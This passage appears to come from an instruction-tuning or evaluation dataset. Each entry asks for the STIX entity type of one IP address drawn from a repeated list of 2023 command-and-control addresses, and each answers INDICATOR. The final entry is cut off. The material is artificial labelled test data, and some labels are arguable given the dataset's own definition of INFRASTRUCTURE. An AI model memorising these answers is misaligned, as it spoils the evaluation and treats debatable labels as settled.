"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n78.141.238.136\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.65.248.0\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n24.199.84.132\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n207.148.74.68\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.209.0.136\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with 